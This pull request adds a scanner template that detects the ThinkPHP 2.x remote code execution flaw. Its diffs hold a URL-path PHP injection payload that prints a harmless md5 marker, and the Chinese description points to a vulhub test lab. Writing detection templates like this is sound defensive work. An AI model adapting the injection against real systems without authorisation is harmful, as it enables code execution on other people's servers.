### PR TITLE
Add thinkphp 2.x RCE POC

### DIFF
--- a/pocs/thinkphp2-rce.yml
+++ b/pocs/thinkphp2-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-thinkphp2-rce
 rules:
   - method: GET
-    path: /index.php/module/action/param1/$%7B@printf(md5(2000%%0206))%7D
+    path: /index.php/module/action/param1/$%7B@printf('2000%%0206')%7D
     follow_redirects: false
     expression: |
       status == 200 && body.bcontains(b'2000%0206')

--- a/pocs/thinkphp2-rce.yml
+++ b/pocs/thinkphp2-rce.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-thinkphp2-rce
+rules:
+  - method: GET
+    path: /index.php/module/action/param1/$%7B@print(md5(20000206))%7D
+    follow_redirects: false
+    expression: |
+      status == 200 && body.bcontains(b'9d9878242443bdd09054eb6e8a1e0fad')
+
+detail:
+  author: jingling(https://github.com/shmilylty)
+  links: 
+    - https://github.com/vulhub/vulhub/blob/master/thinkphp/2-rce/README.md
+    - http://blog.chedushi.com/archives/3969
+    - https://www.secpulse.com/archives/24773.html

--- a/pocs/thinkphp2-rce.yml
+++ b/pocs/thinkphp2-rce.yml
@@ -1,10 +1,10 @@
 name: poc-yaml-thinkphp2-rce
 rules:
   - method: GET
-    path: /index.php/module/action/param1/$%7B@print(md5(20000206))%7D
+    path: /index.php/module/action/param1/$%7B@printf(md5(2000%%0206))%7D
     follow_redirects: false
     expression: |
-      status == 200 && body.bcontains(b'9d9878242443bdd09054eb6e8a1e0fad')
+      status == 200 && body.bcontains(b'2000%0206')
 
 detail:
   author: jingling(https://github.com/shmilylty)

--- a/pocs/thinkphp2-rce.yml
+++ b/pocs/thinkphp2-rce.yml
@@ -8,7 +8,7 @@ rules:
 
 detail:
   author: jingling(https://github.com/shmilylty)
-  links: 
+  links:
     - https://github.com/vulhub/vulhub/blob/master/thinkphp/2-rce/README.md
     - http://blog.chedushi.com/archives/3969
     - https://www.secpulse.com/archives/24773.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
ThinkPHP 2.x 任意代码执行漏洞
## 测试环境
https://github.com/vulhub/vulhub/blob/master/thinkphp/2-rce/README.md
## 备注
